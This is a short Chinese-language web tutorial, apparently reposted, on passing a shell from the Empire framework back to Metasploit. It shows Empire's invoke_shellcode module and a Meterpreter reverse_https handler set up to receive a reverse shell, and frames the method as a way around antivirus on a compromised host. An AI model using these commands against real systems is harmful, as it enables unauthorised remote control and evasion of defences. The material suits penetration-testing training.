您好,欢迎来到九壹网。
搜索
您的当前位置:首页Empire 反弹回 Metasploit

Empire 反弹回 Metasploit

来源:九壹网

转载请注明出处:https:///l1028386804/article/details/86178038

在实际渗透中,当拿到WebShell上传的MSF客户端无法绕过目标主机的杀毒软件时,可以使用PowerShell来绕过,也可以执行Empire的Payload来绕过,成功之后再使用Empiore的模块将其反弹回Metasploit。
这里使用Empire的usemodule code_execution/invoke_shellcode模块修改两个参数:Lhost、Lport。将Lhost修改为MSF所在主机的IP,按以下命令设置:
 

set Lhost 192.168.31.247
set Lport 4444

在MSF上设置监听,命令如下:

 

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.31.247
set lport 4444
run

 运行后,就可以收到Empire反弹回来的Shell

 

因篇幅问题不能全部显示,请点此查看更多更全内容

Copyright © 2019- 91gzw.com 版权所有 湘ICP备2023023988号-2

违法及侵权请联系:TEL:199 18 7713 E-MAIL:2724546146@qq.com

本站由北京市万商天勤律师事务所王兴未律师提供法律服务